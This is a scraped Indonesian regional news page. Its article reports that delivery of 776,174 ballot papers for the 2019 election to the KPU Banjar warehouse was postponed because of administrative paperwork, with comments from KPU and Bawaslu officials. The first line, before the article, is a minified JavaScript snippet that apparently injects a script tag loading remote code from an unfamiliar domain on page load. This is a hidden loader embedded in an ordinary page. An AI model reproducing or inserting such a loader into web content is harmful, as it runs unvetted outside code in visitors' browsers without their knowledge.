(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Politik

Terkendala Administrasi, Kedatangan Surat Suara KPU Banjar Tertunda


MARTAPURA, Rencana kedatangan sebanyak 1.534 pack/boks yang terdiri dari 776.174 lembar surat suara Pemilu 2019, diprediksi tiba di gudang tambahan KPU Banjar di Jalan Jeruk Komplek Graha Mega, Blok No 5 RT 29 RW 07 Sungai Ulin Banjarbaru, Rabu (27/2), tertunda. Kelengkapan administrasi menjadi penyebab molornya kedatangan surat suara.

Demikian disampaikan Ketua Komisi Pemilihan Umum (KPU) Banjar Muhaimin, Rabu (27/2). Ia mengatakan, berdasarkan informasi yang diperoleh sebelumnya, kedatangan Surat Suara ini terbagi menjadi dua tahapan. Untuk tahap pertama, surat suara untuk KPU Banjar seharusnya tiba di gudang tambahan logistik KPU Banjar pada hari Rabu (27/2) siang ini.

Namun berdasarkan informasi terbaru dari Kasubag Logistik KPU Banjar, karena terkendala masalah administrasi dan diprediksi selesai pada sore hari, hingga didahulukan surat suara untuk wilayah Hulu Sungai Utara (HSU) pada hari ini.

“Sebenarnya surat suara untuk KPU Banjar itu sudah dipelabuhan sekarang, malam ini sebenarnya bisa saja didatangkan ke sini setelah proses administrasi selesai pada sore itu, namun itu tidak mungkin kita menerimanya pada malam hari, jadi kita tunda saja hingga besok hari,” ujarnya.

Sementara untuk kesiapan menghadapi kedatangan surat suara, dirinya mengaku pada hari ini sebenarnya sudah melaksanakan apel kesiap siagaan bersama Polres Banjar, Kodim Martapura dan Bawaslu Banjar, sehingga dari segi pengamanan tetap terjaga dan terlaksana.

Ditambahkan Muhaimin, ada 2 jenis surat suara yang diprediksi sampai pada besok hari digudang KPU Banjar, seperti  Surat Suara Pemilu DPR Dapil Kalsel 1 yang berjumlah 846 packs, Surat Suara Pemilu DPRD Kabupaten Banjar Dapil 1 ada 176 packs, Dapil 2 ada 164 Packs, Dapil 3 ada 145 packs dan Dapil 4 dengan jumlah 203 packs. Sementara untuk setiap packsnya berisikan 500 lembar surat suara.

“Untuk tahap pertama ini ada dua jenis surat suara yang datang seperti DPR Dapil 1 Kalsel, DPRD Dapil 1 hingga 4, sisanya untuk DPD, Presiden dan wakil presiden hingga Dapil 5 DPRD Banjar akan didatangkan pada tahap kedua, yang masih belum bisa diprediksi kapan akan tiba di gudang KPU Banjar,” akunya.

Masih di tempat yang sama tanggapan serupa juga disampaikan oleh Kordinator Divisi Humas dan Hubal Bawaslu Kabupaten Banjar Hairul Fallah, menurutnya kedatangan surat suara memang ditunda mengingat masalah administrasi sehingga harus didahulukan untuk wilayah HSU.

“Informasinya begitu, kedatangan surat suara memang ditunda dan baru selesai nanti sore dan besok pagi baru bisa doring, didistribusikan untuk KPU Banjar,” akunya.

Hairul memastikan sebagai badan pengawas pemilu dirinya mewakili Bawaslu Banjar sudah siap dari segala hal baik itu untuk kedatangan surat suara tersebut. “Artinya kami dari Bawaslu Banjar siap kapanpun dibutuhkan terlebih untuk kesiagaan pendiatribusian surat suara tersebut,” pungkasnya. (rendy)

Reporter:Rendy
Editor:Cell

Desy Arfianty

Recent Posts

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

9 menit ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

1 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

14 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

15 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

15 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

15 jam ago

This website uses cookies.